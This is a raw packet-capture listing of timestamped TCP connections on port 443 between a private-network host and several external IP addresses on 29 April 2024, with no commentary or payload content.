Apr 29, 2024 01:11:23.946928978 CEST	49746	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:11:23.946969986 CEST	443	49746	13.85.23.86	192.168.2.4
Apr 29, 2024 01:11:23.947026014 CEST	49746	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:11:23.948817968 CEST	49746	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:11:23.948832035 CEST	443	49746	13.85.23.86	192.168.2.4
Apr 29, 2024 01:11:24.398096085 CEST	443	49746	13.85.23.86	192.168.2.4
Apr 29, 2024 01:11:24.398184061 CEST	49746	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:11:24.402053118 CEST	49746	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:11:24.402060986 CEST	443	49746	13.85.23.86	192.168.2.4
Apr 29, 2024 01:11:24.402456045 CEST	443	49746	13.85.23.86	192.168.2.4
Apr 29, 2024 01:11:24.449925900 CEST	49746	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:11:24.809438944 CEST	49746	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:11:24.856117964 CEST	443	49746	13.85.23.86	192.168.2.4
Apr 29, 2024 01:11:25.093384027 CEST	443	49746	13.85.23.86	192.168.2.4
Apr 29, 2024 01:11:25.093439102 CEST	443	49746	13.85.23.86	192.168.2.4
Apr 29, 2024 01:11:25.093457937 CEST	443	49746	13.85.23.86	192.168.2.4
Apr 29, 2024 01:11:25.093497038 CEST	443	49746	13.85.23.86	192.168.2.4
Apr 29, 2024 01:11:25.093502045 CEST	49746	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:11:25.093532085 CEST	443	49746	13.85.23.86	192.168.2.4
Apr 29, 2024 01:11:25.093538046 CEST	443	49746	13.85.23.86	192.168.2.4
Apr 29, 2024 01:11:25.093539953 CEST	49746	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:11:25.093548059 CEST	49746	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:11:25.093575001 CEST	49746	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:11:25.093653917 CEST	443	49746	13.85.23.86	192.168.2.4
Apr 29, 2024 01:11:25.093708038 CEST	49746	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:11:25.093713045 CEST	443	49746	13.85.23.86	192.168.2.4
Apr 29, 2024 01:11:25.093863010 CEST	443	49746	13.85.23.86	192.168.2.4
Apr 29, 2024 01:11:25.093914986 CEST	49746	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:11:25.344923973 CEST	49746	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:11:25.344949007 CEST	443	49746	13.85.23.86	192.168.2.4
Apr 29, 2024 01:11:25.344976902 CEST	49746	443	192.168.2.4	13.85.23.86
Apr 29, 2024 01:11:25.344984055 CEST	443	49746	13.85.23.86	192.168.2.4
Apr 29, 2024 01:11:26.667949915 CEST	443	49743	142.250.191.196	192.168.2.4
Apr 29, 2024 01:11:26.668006897 CEST	443	49743	142.250.191.196	192.168.2.4
Apr 29, 2024 01:11:26.668154955 CEST	49743	443	192.168.2.4	142.250.191.196
Apr 29, 2024 01:11:26.904509068 CEST	49743	443	192.168.2.4	142.250.191.196
Apr 29, 2024 01:11:26.904575109 CEST	443	49743	142.250.191.196	192.168.2.4
Apr 29, 2024 01:11:38.902754068 CEST	49752	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:38.902841091 CEST	443	49752	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:38.902916908 CEST	49752	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:38.903285980 CEST	49753	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:38.903357983 CEST	443	49753	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:38.903429031 CEST	49753	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:38.903595924 CEST	49752	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:38.903644085 CEST	443	49752	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:38.903954983 CEST	49753	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:38.903989077 CEST	443	49753	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.140084028 CEST	443	49752	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.140325069 CEST	49752	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.140357971 CEST	443	49752	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.141385078 CEST	443	49752	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.141446114 CEST	49752	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.146167994 CEST	49752	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.146240950 CEST	443	49752	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.146331072 CEST	49752	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.146344900 CEST	443	49752	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.152710915 CEST	443	49753	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.154622078 CEST	49753	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.154649019 CEST	443	49753	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.156254053 CEST	443	49753	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.156332016 CEST	49753	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.157459021 CEST	49753	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.157563925 CEST	443	49753	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.187733889 CEST	49752	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.209076881 CEST	49753	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.209131956 CEST	443	49753	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.254738092 CEST	49753	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.405610085 CEST	443	49752	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.405656099 CEST	443	49752	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.405677080 CEST	443	49752	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.405698061 CEST	443	49752	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.405698061 CEST	49752	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.405719042 CEST	443	49752	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.405728102 CEST	443	49752	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.405742884 CEST	49752	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.405757904 CEST	443	49752	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.405764103 CEST	49752	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.405787945 CEST	443	49752	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.405875921 CEST	49752	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.405888081 CEST	443	49752	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.406183958 CEST	443	49752	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.406363010 CEST	49752	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.407054901 CEST	49752	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.407080889 CEST	443	49752	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.426974058 CEST	49753	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.472165108 CEST	443	49753	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.539621115 CEST	49754	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:39.539675951 CEST	443	49754	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:39.539763927 CEST	49755	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:39.539764881 CEST	49754	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:39.539804935 CEST	443	49755	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:39.539913893 CEST	49755	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:39.540054083 CEST	49754	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:39.540097952 CEST	443	49754	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:39.540251017 CEST	49755	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:39.540277958 CEST	443	49755	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:39.546875954 CEST	443	49753	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.547023058 CEST	443	49753	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.547081947 CEST	49753	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.547100067 CEST	443	49753	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.547188997 CEST	443	49753	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.547276020 CEST	49753	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.547290087 CEST	443	49753	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.547380924 CEST	443	49753	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.547460079 CEST	49753	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.547466040 CEST	443	49753	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.547493935 CEST	443	49753	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.547678947 CEST	49753	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.547689915 CEST	443	49753	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.547740936 CEST	49753	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.548228025 CEST	49753	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:39.548247099 CEST	443	49753	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:39.673425913 CEST	49756	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:39.673461914 CEST	443	49756	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:39.673583031 CEST	49756	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:39.673790932 CEST	49756	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:39.673795938 CEST	443	49756	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:39.915973902 CEST	443	49756	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:39.916220903 CEST	49756	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:39.916238070 CEST	443	49756	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:39.917644978 CEST	443	49756	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:39.917706966 CEST	49756	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:39.918850899 CEST	49756	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:39.918926001 CEST	443	49756	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:39.919017076 CEST	49756	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:39.945602894 CEST	443	49754	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:39.945781946 CEST	49754	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:39.945796967 CEST	443	49754	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:39.946784019 CEST	443	49754	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:39.946850061 CEST	49754	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:39.947807074 CEST	49754	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:39.947884083 CEST	443	49754	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:39.947998047 CEST	49754	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:39.948010921 CEST	443	49754	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:39.954653978 CEST	443	49755	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:39.954843998 CEST	49755	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:39.954880953 CEST	443	49755	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:39.956368923 CEST	443	49755	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:39.956432104 CEST	49755	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:39.957398891 CEST	49755	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:39.957496881 CEST	443	49755	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:39.957523108 CEST	49755	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:39.964113951 CEST	443	49756	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:39.966186047 CEST	49756	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:39.966195107 CEST	443	49756	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:39.998306990 CEST	49754	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:39.998492002 CEST	49755	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:39.998511076 CEST	443	49755	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.013582945 CEST	49756	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:40.042016983 CEST	49755	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.180613995 CEST	443	49756	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:40.180741072 CEST	443	49756	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:40.180850029 CEST	443	49756	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:40.180875063 CEST	49756	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:40.180885077 CEST	443	49756	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:40.180990934 CEST	49756	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:40.180995941 CEST	443	49756	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:40.181087017 CEST	443	49756	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:40.181173086 CEST	49756	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:40.181174040 CEST	443	49756	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:40.181200027 CEST	443	49756	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:40.181236982 CEST	49756	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:40.181277037 CEST	443	49756	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:40.181467056 CEST	443	49756	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:40.181520939 CEST	49756	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:40.182753086 CEST	49756	443	192.168.2.4	104.21.235.181
Apr 29, 2024 01:11:40.182766914 CEST	443	49756	104.21.235.181	192.168.2.4
Apr 29, 2024 01:11:40.209209919 CEST	443	49754	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.209546089 CEST	443	49754	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.209599018 CEST	49754	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.209608078 CEST	443	49754	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.209619045 CEST	443	49754	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.209666014 CEST	49754	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.210155010 CEST	49754	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.210159063 CEST	443	49754	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.293402910 CEST	49758	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:11:40.293447971 CEST	443	49758	35.190.80.1	192.168.2.4
Apr 29, 2024 01:11:40.293740034 CEST	49758	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:11:40.293740988 CEST	49758	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:11:40.293806076 CEST	443	49758	35.190.80.1	192.168.2.4
Apr 29, 2024 01:11:40.330295086 CEST	49759	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.330323935 CEST	443	49759	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.330384970 CEST	49759	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.330585003 CEST	49759	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.330596924 CEST	443	49759	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.379491091 CEST	443	49755	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.379849911 CEST	443	49755	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.380810976 CEST	49755	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.381117105 CEST	49755	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.381154060 CEST	443	49755	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.385750055 CEST	49760	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.385773897 CEST	443	49760	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.385936022 CEST	49760	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.389681101 CEST	49760	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.389683962 CEST	49761	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:40.389693022 CEST	443	49760	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.389714003 CEST	443	49761	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:40.389842987 CEST	49761	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:40.391978025 CEST	49761	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:40.391990900 CEST	443	49761	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:40.522612095 CEST	443	49758	35.190.80.1	192.168.2.4
Apr 29, 2024 01:11:40.522821903 CEST	49758	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:11:40.522831917 CEST	443	49758	35.190.80.1	192.168.2.4
Apr 29, 2024 01:11:40.523833036 CEST	443	49758	35.190.80.1	192.168.2.4
Apr 29, 2024 01:11:40.523996115 CEST	49758	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:11:40.524971008 CEST	49758	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:11:40.524971008 CEST	49758	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:11:40.524982929 CEST	443	49758	35.190.80.1	192.168.2.4
Apr 29, 2024 01:11:40.525029898 CEST	443	49758	35.190.80.1	192.168.2.4
Apr 29, 2024 01:11:40.573299885 CEST	49758	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:11:40.573317051 CEST	443	49758	35.190.80.1	192.168.2.4
Apr 29, 2024 01:11:40.622701883 CEST	443	49761	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:40.623157024 CEST	49761	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:40.623169899 CEST	443	49761	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:40.623533964 CEST	443	49761	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:40.623971939 CEST	49761	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:40.623971939 CEST	49761	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:40.623985052 CEST	443	49761	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:40.624030113 CEST	443	49761	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:40.626022100 CEST	49758	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:11:40.669358015 CEST	49761	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:40.728800058 CEST	443	49759	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.729023933 CEST	49759	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.729038000 CEST	443	49759	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.730469942 CEST	443	49759	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.730674028 CEST	49759	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.730956078 CEST	49759	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.730956078 CEST	49759	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.731035948 CEST	443	49759	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.754117966 CEST	443	49758	35.190.80.1	192.168.2.4
Apr 29, 2024 01:11:40.754201889 CEST	443	49758	35.190.80.1	192.168.2.4
Apr 29, 2024 01:11:40.754384041 CEST	49758	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:11:40.754411936 CEST	443	49758	35.190.80.1	192.168.2.4
Apr 29, 2024 01:11:40.754451036 CEST	49758	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:11:40.754637957 CEST	49758	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:11:40.755136013 CEST	49762	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:11:40.755171061 CEST	443	49762	35.190.80.1	192.168.2.4
Apr 29, 2024 01:11:40.755265951 CEST	49762	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:11:40.755453110 CEST	49762	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:11:40.755470037 CEST	443	49762	35.190.80.1	192.168.2.4
Apr 29, 2024 01:11:40.781990051 CEST	49759	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.781999111 CEST	443	49759	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.782461882 CEST	443	49760	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.782758951 CEST	49760	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.782779932 CEST	443	49760	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.784234047 CEST	443	49760	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.784353018 CEST	49760	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.784590006 CEST	49760	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.784678936 CEST	443	49760	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.784710884 CEST	49760	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.825292110 CEST	49759	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.825293064 CEST	49760	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.825314045 CEST	443	49760	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.889952898 CEST	49760	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:40.891561985 CEST	443	49761	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:40.891604900 CEST	443	49761	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:40.891629934 CEST	443	49761	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:40.891654015 CEST	443	49761	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:40.891679049 CEST	443	49761	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:40.891716957 CEST	443	49761	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:40.891725063 CEST	49761	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:40.891735077 CEST	443	49761	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:40.891745090 CEST	443	49761	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:40.891772032 CEST	49761	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:40.891995907 CEST	443	49761	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:40.892052889 CEST	49761	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:40.896569014 CEST	49761	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:40.944623947 CEST	49761	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:40.944645882 CEST	443	49761	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:40.980345964 CEST	443	49762	35.190.80.1	192.168.2.4
Apr 29, 2024 01:11:40.988651037 CEST	443	49759	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.988734961 CEST	443	49759	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.988862038 CEST	443	49759	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:40.993913889 CEST	49759	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:41.037833929 CEST	49762	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:11:41.219876051 CEST	443	49760	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:41.220180988 CEST	443	49760	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:41.222518921 CEST	49760	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:42.270940065 CEST	49763	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:42.270982027 CEST	443	49763	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:42.271038055 CEST	49763	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:42.271728992 CEST	49762	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:11:42.271795034 CEST	443	49762	35.190.80.1	192.168.2.4
Apr 29, 2024 01:11:42.272135973 CEST	49763	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:42.272150993 CEST	443	49763	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:42.272326946 CEST	443	49762	35.190.80.1	192.168.2.4
Apr 29, 2024 01:11:42.283786058 CEST	49762	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:11:42.283895969 CEST	443	49762	35.190.80.1	192.168.2.4
Apr 29, 2024 01:11:42.283993006 CEST	49762	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:11:42.290760994 CEST	49760	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:42.290774107 CEST	443	49760	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:42.291203976 CEST	49759	443	192.168.2.4	13.107.246.51
Apr 29, 2024 01:11:42.291224003 CEST	443	49759	13.107.246.51	192.168.2.4
Apr 29, 2024 01:11:42.324146032 CEST	443	49762	35.190.80.1	192.168.2.4
Apr 29, 2024 01:11:42.511794090 CEST	443	49763	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:42.518362045 CEST	443	49762	35.190.80.1	192.168.2.4
Apr 29, 2024 01:11:42.518532991 CEST	443	49762	35.190.80.1	192.168.2.4
Apr 29, 2024 01:11:42.518604994 CEST	49762	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:11:42.557631969 CEST	49763	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:42.687158108 CEST	49762	443	192.168.2.4	35.190.80.1
Apr 29, 2024 01:11:42.687199116 CEST	443	49762	35.190.80.1	192.168.2.4
Apr 29, 2024 01:11:42.687859058 CEST	49763	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:42.687871933 CEST	443	49763	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:42.691716909 CEST	443	49763	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:42.691788912 CEST	49763	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:42.694242001 CEST	49763	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:42.694426060 CEST	443	49763	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:42.694767952 CEST	49763	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:42.694775105 CEST	443	49763	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:42.747549057 CEST	49763	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:42.817218065 CEST	443	49763	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:42.817348957 CEST	443	49763	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:42.817398071 CEST	49763	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:42.817406893 CEST	443	49763	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:42.817487001 CEST	443	49763	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:42.817524910 CEST	49763	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:42.817531109 CEST	443	49763	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:42.817637920 CEST	443	49763	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:42.817682028 CEST	49763	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:42.817687035 CEST	443	49763	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:42.817819118 CEST	443	49763	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:42.817862988 CEST	49763	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:42.817868948 CEST	443	49763	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:42.817959070 CEST	443	49763	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:42.818001986 CEST	49763	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:42.828289986 CEST	49763	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:42.828303099 CEST	443	49763	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.063321114 CEST	49767	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:55.063400030 CEST	443	49767	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.063621998 CEST	49767	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:55.064794064 CEST	49767	443	192.168.2.4	104.21.55.4
Apr 29, 2024 01:11:55.064831018 CEST	443	49767	104.21.55.4	192.168.2.4
Apr 29, 2024 01:11:55.070509911 CEST	49768	443	192.168.2.4	104.21.55.4
